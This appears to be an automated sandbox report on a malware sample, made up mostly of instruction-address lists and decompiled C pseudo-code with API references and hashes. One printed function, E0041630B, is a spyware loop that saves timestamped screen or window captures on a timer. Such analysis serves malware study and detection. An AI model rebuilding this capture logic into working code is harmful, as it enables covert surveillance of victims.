                                                                                                0x00413241
                                                                                                0x00413246
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413250
                                                                                                0x00413255
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041325f
                                                                                                0x00413264
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413270
                                                                                                0x00413274
                                                                                                0x0041327a
                                                                                                0x0041327f
                                                                                                0x00413284
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413293
                                                                                                0x00413293
                                                                                                0x00413294
                                                                                                0x00413299
                                                                                                0x0041329f
                                                                                                0x004132a4
                                                                                                0x004132a7
                                                                                                0x004132aa
                                                                                                0x004132af
                                                                                                0x004132b4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004132c4
                                                                                                0x004132c9
                                                                                                0x004132cb
                                                                                                0x004132d0
                                                                                                0x00413289
                                                                                                0x00413289
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004139c4
                                                                                                0x004139c5
                                                                                                0x004139ca
                                                                                                0x004139d0
                                                                                                0x004139d2
                                                                                                0x004139d4
                                                                                                0x004139d4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004132d4
                                                                                                0x004132d6
                                                                                                0x004132db
                                                                                                0x004132e0
                                                                                                0x004132e6
                                                                                                0x004132e8
                                                                                                0x004132ed
                                                                                                0x004132f2
                                                                                                0x004132f4
                                                                                                0x004132fa
                                                                                                0x004132fc
                                                                                                0x00413301
                                                                                                0x00413304
                                                                                                0x00413306
                                                                                                0x00413307
                                                                                                0x0041330d
                                                                                                0x00413318
                                                                                                0x0041330f
                                                                                                0x0041330f
                                                                                                0x00413314
                                                                                                0x0041331f
                                                                                                0x00413321
                                                                                                0x0041332c
                                                                                                0x0041332e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413338
                                                                                                0x0041333e
                                                                                                0x00413343
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041334d
                                                                                                0x0041334f
                                                                                                0x00413355
                                                                                                0x0041335b
                                                                                                0x00413360
                                                                                                0x00413363
                                                                                                0x00413366
                                                                                                0x0041336d
                                                                                                0x00413376
                                                                                                0x00413378
                                                                                                0x00413384
                                                                                                0x00413387
                                                                                                0x00413390
                                                                                                0x00413392
                                                                                                0x00413398
                                                                                                0x0041339f
                                                                                                0x004133a3
                                                                                                0x004133aa
                                                                                                0x004133ac
                                                                                                0x004133b2
                                                                                                0x004133b8
                                                                                                0x004133ba
                                                                                                0x004133bc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004133c9
                                                                                                0x004133ca
                                                                                                0x004133cf
                                                                                                0x004133e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004133ed
                                                                                                0x004133ed
                                                                                                0x004133ee
                                                                                                0x004133f3
                                                                                                0x004133f9
                                                                                                0x004133fe
                                                                                                0x00413401
                                                                                                0x00413404
                                                                                                0x0041340b
                                                                                                0x0041340f
                                                                                                0x00413414
                                                                                                0x00413417
                                                                                                0x0041341f
                                                                                                0x00413424
                                                                                                0x004132b9
                                                                                                0x004132b9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041342e
                                                                                                0x00413437
                                                                                                0x0041343f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041344a
                                                                                                0x00413451
                                                                                                0x00000000
                                                                                                0x0041345f
                                                                                                0x0041345f
                                                                                                0x00413465
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413459
                                                                                                0x00413459
                                                                                                0x00413468
                                                                                                0x00413469
                                                                                                0x0041346b
                                                                                                0x0041346b
                                                                                                0x00413e1a
                                                                                                0x00413e22
                                                                                                0x00413e23
                                                                                                0x00413e25
                                                                                                0x00413e27
                                                                                                0x00413e28
                                                                                                0x00413e29
                                                                                                0x00413e2c
                                                                                                0x00413e2d
                                                                                                0x00413e2f
                                                                                                0x00413e34
                                                                                                0x00413e35
                                                                                                0x00413e37
                                                                                                0x00413e38
                                                                                                0x00413e39
                                                                                                0x00413e3b
                                                                                                0x00413e3e
                                                                                                0x00413e40
                                                                                                0x00413e41
                                                                                                0x00413e44
                                                                                                0x00413e45
                                                                                                0x00413e48
                                                                                                0x00413e49
                                                                                                0x00413e4f
                                                                                                0x00413e52
                                                                                                0x00413e54
                                                                                                0x00413e55
                                                                                                0x00413e57
                                                                                                0x00413e57
                                                                                                0x00413e5a
                                                                                                0x00413e5c
                                                                                                0x00413e5d
                                                                                                0x00413e63
                                                                                                0x00413e66
                                                                                                0x00413e68
                                                                                                0x00413e69
                                                                                                0x00413e6c
                                                                                                0x00413e6d
                                                                                                0x00413e70
                                                                                                0x00413e71
                                                                                                0x00413e74
                                                                                                0x00413e75
                                                                                                0x00413e7b
                                                                                                0x00413e7e
                                                                                                0x00413e80
                                                                                                0x00413e81
                                                                                                0x00413e83
                                                                                                0x00413e88
                                                                                                0x00413e89
                                                                                                0x00413e8b
                                                                                                0x00413e8b
                                                                                                0x00413e8b
                                                                                                0x00413e8d
                                                                                                0x00413e8f
                                                                                                0x00413e92
                                                                                                0x00413e93
                                                                                                0x00413e96
                                                                                                0x00413e96
                                                                                                0x00413e97
                                                                                                0x00413e9a
                                                                                                0x00413e9b
                                                                                                0x00413e9e
                                                                                                0x00413ea0
                                                                                                0x00413ea1
                                                                                                0x00413ea4
                                                                                                0x00413ea5
                                                                                                0x00413ea8
                                                                                                0x00413ea9
                                                                                                0x00413ead
                                                                                                0x00413eb0
                                                                                                0x00413eb1
                                                                                                0x00413eb8
                                                                                                0x00413eb9
                                                                                                0x00413ebb
                                                                                                0x00413ebd
                                                                                                0x00413ec3
                                                                                                0x00413ec4
                                                                                                0x00413ec5
                                                                                                0x00413ecb
                                                                                                0x00413ece
                                                                                                0x00413ed6
                                                                                                0x00413edb
                                                                                                0x00413ede
                                                                                                0x00413ee0
                                                                                                0x00413ee1
                                                                                                0x00413ee3
                                                                                                0x00413ee6
                                                                                                0x00413ee7
                                                                                                0x00413eea
                                                                                                0x00413eeb
                                                                                                0x00413ef0
                                                                                                0x00413ef1
                                                                                                0x00413ef6
                                                                                                0x00413ef8
                                                                                                0x00413ef9
                                                                                                0x00413efc
                                                                                                0x00413efd
                                                                                                0x00413f04
                                                                                                0x00413f05
                                                                                                0x00413f07
                                                                                                0x00413f0a
                                                                                                0x00413f0c
                                                                                                0x00413f0d
                                                                                                0x00413f14
                                                                                                0x00413f15
                                                                                                0x00413f1b
                                                                                                0x00413f20
                                                                                                0x00413f21
                                                                                                0x00413f23
                                                                                                0x00413f25
                                                                                                0x00413f2b
                                                                                                0x00413f2d
                                                                                                0x00413f30
                                                                                                0x00413f31
                                                                                                0x00413f33
                                                                                                0x00413f35
                                                                                                0x00413f37
                                                                                                0x00413f3a
                                                                                                0x00413f3b
                                                                                                0x00413f3f
                                                                                                0x00413f41
                                                                                                0x00413f43
                                                                                                0x00413f45
                                                                                                0x00413f45
                                                                                                0x00413f47
                                                                                                0x00413f47
                                                                                                0x00413f48
                                                                                                0x00413f49
                                                                                                0x00413f4b
                                                                                                0x00413f4d
                                                                                                0x00413f4f
                                                                                                0x00413f51
                                                                                                0x00413f53
                                                                                                0x00413f55
                                                                                                0x00413f57
                                                                                                0x00413f59
                                                                                                0x00413f5e
                                                                                                0x00413f60
                                                                                                0x00413f61
                                                                                                0x00413f62
                                                                                                0x00413f66
                                                                                                0x00413f6e
                                                                                                0x00413f70
                                                                                                0x00413f71
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041346c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041347e
                                                                                                0x0041347e
                                                                                                0x00413484
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413478
                                                                                                0x00413478
                                                                                                0x00413486
                                                                                                0x00413488
                                                                                                0x00413492
                                                                                                0x00413494
                                                                                                0x0041349b
                                                                                                0x0041349f
                                                                                                0x004134a6
                                                                                                0x004134a8
                                                                                                0x004134ad
                                                                                                0x004134af
                                                                                                0x004134b4
                                                                                                0x004134ba
                                                                                                0x004134bb
                                                                                                0x004134bc
                                                                                                0x004134c5
                                                                                                0x004134c8
                                                                                                0x004134d1
                                                                                                0x004134d3
                                                                                                0x004134d8
                                                                                                0x004134d9
                                                                                                0x004134da
                                                                                                0x004134e0
                                                                                                0x004134e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041350c
                                                                                                0x0041350c
                                                                                                0x00413512
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413506
                                                                                                0x00413506
                                                                                                0x00413516
                                                                                                0x0041351f
                                                                                                0x00413521
                                                                                                0x00413528
                                                                                                0x0041352c
                                                                                                0x00413533
                                                                                                0x00413535
                                                                                                0x0041353a
                                                                                                0x0041353c
                                                                                                0x00413541
                                                                                                0x00413547
                                                                                                0x0041354b
                                                                                                0x00413552
                                                                                                0x00413556
                                                                                                0x00413558
                                                                                                0x0041355d
                                                                                                0x00413560
                                                                                                0x00413563
                                                                                                0x00413568
                                                                                                0x0041356a
                                                                                                0x0041356f
                                                                                                0x00413572
                                                                                                0x00413574
                                                                                                0x004134e8
                                                                                                0x004134e8
                                                                                                0x004134eb
                                                                                                0x004134ef
                                                                                                0x004134f7
                                                                                                0x004134fc
                                                                                                0x004134fc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413581
                                                                                                0x0041358a
                                                                                                0x0041358c
                                                                                                0x00413598
                                                                                                0x0041359d
                                                                                                0x004135a9
                                                                                                0x004135ab
                                                                                                0x004135b1
                                                                                                0x004135b3
                                                                                                0x004135bd
                                                                                                0x004135bf
                                                                                                0x004135c6
                                                                                                0x004135cd
                                                                                                0x004135d1
                                                                                                0x004135d3
                                                                                                0x004135d8
                                                                                                0x004135db
                                                                                                0x004135df
                                                                                                0x004135e1
                                                                                                0x004135ee
                                                                                                0x004135f0
                                                                                                0x004135fa
                                                                                                0x004135fc
                                                                                                0x004135fe
                                                                                                0x00413604
                                                                                                0x00413dd2
                                                                                                0x00413dd2
                                                                                                0x00413dd7
                                                                                                0x00413ddc
                                                                                                0x00413de0
                                                                                                0x00413de5
                                                                                                0x00413de9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041360b
                                                                                                0x00413610
                                                                                                0x00413612
                                                                                                0x00413617
                                                                                                0x0041361c
                                                                                                0x00413621
                                                                                                0x00413623
                                                                                                0x00413628
                                                                                                0x0041362c
                                                                                                0x0041362d
                                                                                                0x0041362f
                                                                                                0x00413647
                                                                                                0x0041364c
                                                                                                0x00413651
                                                                                                0x00413653
                                                                                                0x00413658
                                                                                                0x0041365c
                                                                                                0x0041365d
                                                                                                0x0041365f
                                                                                                0x0041367a
                                                                                                0x0041367f
                                                                                                0x00413684
                                                                                                0x00413686
                                                                                                0x0041368b
                                                                                                0x0041368d
                                                                                                0x004136c2
                                                                                                0x004136c9
                                                                                                0x004136d0
                                                                                                0x004136d4
                                                                                                0x004136d6
                                                                                                0x004136db
                                                                                                0x004136e0
                                                                                                0x004136e2
                                                                                                0x004136e7
                                                                                                0x004136e8
                                                                                                0x004136ea
                                                                                                0x004136f0
                                                                                                0x004136f4
                                                                                                0x004136f9
                                                                                                0x004136fe
                                                                                                0x00413700
                                                                                                0x00413705
                                                                                                0x00413707
                                                                                                0x0041370d
                                                                                                0x0041370e
                                                                                                0x0041370f
                                                                                                0x00000000
                                                                                                0x0041370f
                                                                                                0x004136ec
                                                                                                0x004136ec
                                                                                                0x004136ed
                                                                                                0x00413711
                                                                                                0x00413711
                                                                                                0x00413711
                                                                                                0x0041368f
                                                                                                0x0041368f
                                                                                                0x00413692
                                                                                                0x0041369b
                                                                                                0x0041369d
                                                                                                0x004136a3
                                                                                                0x004136a8
                                                                                                0x004136a8
                                                                                                0x00000000
                                                                                                0x004136a8
                                                                                                0x00413661
                                                                                                0x00413668
                                                                                                0x0041366a
                                                                                                0x00413670
                                                                                                0x00413675
                                                                                                0x00000000
                                                                                                0x00413675
                                                                                                0x00413631
                                                                                                0x00413638
                                                                                                0x0041363a
                                                                                                0x00413640
                                                                                                0x004136ab
                                                                                                0x004136ab
                                                                                                0x004136ad
                                                                                                0x004136ad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004137b2
                                                                                                0x004137b3
                                                                                                0x004137b9
                                                                                                0x004137bb
                                                                                                0x004137c9
                                                                                                0x004137d3
                                                                                                0x004137db
                                                                                                0x004137e1
                                                                                                0x004137e8
                                                                                                0x004137ec
                                                                                                0x004137f0
                                                                                                0x004137f5
                                                                                                0x004137f8
                                                                                                0x004137fc
                                                                                                0x004137fe
                                                                                                0x00413803
                                                                                                0x00413805
                                                                                                0x0041380a
                                                                                                0x00413bb3
                                                                                                0x00413bb3
                                                                                                0x00413bb7
                                                                                                0x00413bb7
                                                                                                0x00413bb7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041371f
                                                                                                0x00413721
                                                                                                0x00413727
                                                                                                0x0041372e
                                                                                                0x00413737
                                                                                                0x00413739
                                                                                                0x0041373e
                                                                                                0x0041374d
                                                                                                0x00413750
                                                                                                0x00413757
                                                                                                0x0041375b
                                                                                                0x00413762
                                                                                                0x00413764
                                                                                                0x0041376b
                                                                                                0x00413774
                                                                                                0x0041378f
                                                                                                0x00000000
                                                                                                0x0041378f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413798
                                                                                                0x0041379e
                                                                                                0x004137a0
                                                                                                0x004137a6
                                                                                                0x004137ac
                                                                                                0x004137ac
                                                                                                0x00000000
                                                                                                0x004137ac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413814
                                                                                                0x00413816
                                                                                                0x00413820
                                                                                                0x00413822
                                                                                                0x00413828
                                                                                                0x0041382c
                                                                                                0x00413833
                                                                                                0x00413835
                                                                                                0x0041383a
                                                                                                0x0041383c
                                                                                                0x0041383e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413848
                                                                                                0x0041384c
                                                                                                0x00413850
                                                                                                0x00413854
                                                                                                0x00413858
                                                                                                0x00413861
                                                                                                0x00413863
                                                                                                0x00413868
                                                                                                0x0041386c
                                                                                                0x0041386e
                                                                                                0x00413874
                                                                                                0x00413877
                                                                                                0x0041387d
                                                                                                0x00413881
                                                                                                0x0041388e
                                                                                                0x00413219
                                                                                                0x00413219
                                                                                                0x00413219
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413898
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004138a4
                                                                                                0x004138a8
                                                                                                0x004138ad
                                                                                                0x004138b0
                                                                                                0x004138b8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004138c4
                                                                                                0x004138c8
                                                                                                0x004138cd
                                                                                                0x004138d0
                                                                                                0x004138d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004138e4
                                                                                                0x004138e8
                                                                                                0x004138ed
                                                                                                0x004138f0
                                                                                                0x004138f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00413902
                                                                                                0x00413903
                                                                                                0x00413908
                                                                                                0x0041390a
                                                                                                0x00413910
                                                                                                0x00413912
                                                                                                0x00413918
                                                                                                0x0041391a
                                                                                                0x00413924
                                                                                                0x0041392b
                                                                                                0x0041392c
                                                                                                0x00413937
                                                                                                0x00413939
                                                                                                0x00413944
                                                                                                0x0041394e
                                                                                                0x00413950
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041395c
                                                                                                0x00413960
                                                                                                0x00413965
                                                                                                0x00413968
                                                                                                0x00413970
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004139a6
                                                                                                0x004139aa
                                                                                                0x004139af
                                                                                                0x004139b2
                                                                                                0x004139ba
                                                                                                0x00413b0f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412e59
                                                                                                0x00412e51
                                                                                                0x00412e47
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventTick
                                                                                                • String ID: HF$HF$HF$PF
                                                                                                • API String ID: 180926312-3347331645
                                                                                                • Opcode ID: 8d39ebd075f2e4d30771cb62cde4870a410da87c6548a22669e7f1b012373cd2
                                                                                                • Instruction ID: 12f824fe3a0a4d57d23bdaa83c3e91856d9f09159caa76b9d1b7f9d133a57d07
                                                                                                • Opcode Fuzzy Hash: 8d39ebd075f2e4d30771cb62cde4870a410da87c6548a22669e7f1b012373cd2
                                                                                                • Instruction Fuzzy Hash: 0FE190716083005BC614FB72D957AEE76A89B90308F40093FF546A71E2EE7C9E49C69B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044A796, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0044A796(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46c178) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004414D5(_t46);
							E004499D2( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004414D5(_t47);
							E00449E8C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004414D5( *((intOrPtr*)(_t74 + 0x7c)));
						E004414D5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004414D5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004414D5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004414D5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004414D5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0044A909( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46c298) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004414D5(_t31);
							E004414D5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004414D5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004414D5(_t74);
			}















                                                                                                0x0044a79e
                                                                                                0x0044a7a2
                                                                                                0x0044a7aa
                                                                                                0x0044a7b3
                                                                                                0x0044a7b8
                                                                                                0x0044a7bf
                                                                                                0x0044a7c7
                                                                                                0x0044a7cf
                                                                                                0x0044a7da
                                                                                                0x0044a7e0
                                                                                                0x0044a7e1
                                                                                                0x0044a7e9
                                                                                                0x0044a7f1
                                                                                                0x0044a7fc
                                                                                                0x0044a802
                                                                                                0x0044a806
                                                                                                0x0044a811
                                                                                                0x0044a817
                                                                                                0x0044a7b8
                                                                                                0x0044a818
                                                                                                0x0044a820
                                                                                                0x0044a833
                                                                                                0x0044a846
                                                                                                0x0044a854
                                                                                                0x0044a85f
                                                                                                0x0044a864
                                                                                                0x0044a86d
                                                                                                0x0044a875
                                                                                                0x0044a876
                                                                                                0x0044a87c
                                                                                                0x0044a87f
                                                                                                0x0044a882
                                                                                                0x0044a889
                                                                                                0x0044a88b
                                                                                                0x0044a88f
                                                                                                0x0044a897
                                                                                                0x0044a89e
                                                                                                0x0044a8a4
                                                                                                0x0044a8a5
                                                                                                0x0044a8a5
                                                                                                0x0044a8ac
                                                                                                0x0044a8ae
                                                                                                0x0044a8b3
                                                                                                0x0044a8bb
                                                                                                0x0044a8c0
                                                                                                0x0044a8c1
                                                                                                0x0044a8c1
                                                                                                0x0044a8c4
                                                                                                0x0044a8c7
                                                                                                0x0044a8ca
                                                                                                0x0044a8cd
                                                                                                0x0044a8cd
                                                                                                0x0044a8df

                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0044A7DA
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 004499EF
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A01
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A13
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A25
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A37
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A49
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A5B
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A6D
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A7F
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449A91
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449AA3
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449AB5
                                                                                                  • Part of subcall function 004499D2: _free.LIBCMT ref: 00449AC7
                                                                                                • _free.LIBCMT ref: 0044A7CF
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 0044A7F1
                                                                                                • _free.LIBCMT ref: 0044A806
                                                                                                • _free.LIBCMT ref: 0044A811
                                                                                                • _free.LIBCMT ref: 0044A833
                                                                                                • _free.LIBCMT ref: 0044A846
                                                                                                • _free.LIBCMT ref: 0044A854
                                                                                                • _free.LIBCMT ref: 0044A85F
                                                                                                • _free.LIBCMT ref: 0044A897
                                                                                                • _free.LIBCMT ref: 0044A89E
                                                                                                • _free.LIBCMT ref: 0044A8BB
                                                                                                • _free.LIBCMT ref: 0044A8D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 5cecdca5b1c34f3a4b02b1176522f84f357f73c3a3e7df90d1abd73a0d0aed16
                                                                                                • Instruction ID: d2a2797c9a58acaa18c78beddbbc7da76900a29e410abb4f836319af01a7758d
                                                                                                • Opcode Fuzzy Hash: 5cecdca5b1c34f3a4b02b1176522f84f357f73c3a3e7df90d1abd73a0d0aed16
                                                                                                • Instruction Fuzzy Hash: BE313D31540605AFFB20AE7AD845B5B73F8EF40364F14842FE459DB661DF38ACA18B29
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041630B, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E0041630B() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E00452248(E004537FE, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46de94 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E00414DBD(_t131);
					__imp__GdiplusStartup(0x46de94, _t131, 0);
				}
				_t150 =  *0x46dd64 - _t92; // 0x0
				if(_t150 == 0) {
					E00401EEC(0x46e990, _t132, _t141, E00415862(_t146 - 0x40));
					E00401EE2();
				}
				_t42 = E00401F87(E00401E3B(0x46e3a4, _t132, _t150, 0x19));
				_t45 = E00401EDD(E00417CCA(_t146 - 0x58, E00401E3B(0x46e3a4, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				E00401EEC(0x46e978,  *_t42, 0x46e978, E00418A4B(_t146 - 0x40,  *_t42, _t45));
				E00401EE2();
				E00401EE2();
				CreateDirectoryW(E00401EDD(0x46e978), _t92);
				E00401F5F(_t92, _t146 - 0xb0);
				E00401F5F(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46dd5f = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						E00414D96(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						E00401EEC(_t146 - 0x80, _t66, _t145, E00403098(_t92, _t146 - 0x58, E00403098(_t92, _t146 - 0x40, E00407677(_t146 - 0x98, 0x46e978, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						E00401EE2();
						E00401EE2();
						E00401EE2();
						_t72 = E00401EDD(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E00416141(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E004374E4(_t75, E00401F87(E00401E3B(0x46e3a4, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E004374E4(_t79, E00401F87(E00401E3B(0x46e3a4, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = E00401F87(E00401E3B(0x46e3a4, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E00404260(_t92, _t148, _t83);
						_t85 = E004184AF(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}




















                                                                                                0x00416310
                                                                                                0x0041631c
                                                                                                0x0041631e
                                                                                                0x00416321
                                                                                                0x00416323
                                                                                                0x00416326
                                                                                                0x0041632c
                                                                                                0x0041632e
                                                                                                0x00416331
                                                                                                0x00416334
                                                                                                0x00416342
                                                                                                0x00416342
                                                                                                0x00416348
                                                                                                0x0041634e
                                                                                                0x0041635e
                                                                                                0x00416366
                                                                                                0x00416366
                                                                                                0x0041637b
                                                                                                0x00416397
                                                                                                0x0041639d
                                                                                                0x004163b0
                                                                                                0x004163b8
                                                                                                0x004163c0
                                                                                                0x004163ce
                                                                                                0x004163da
                                                                                                0x004163e2
                                                                                                0x004163e7
                                                                                                0x004163ea
                                                                                                0x004163fb
                                                                                                0x00416401
                                                                                                0x00416404
                                                                                                0x00416407
                                                                                                0x00000000
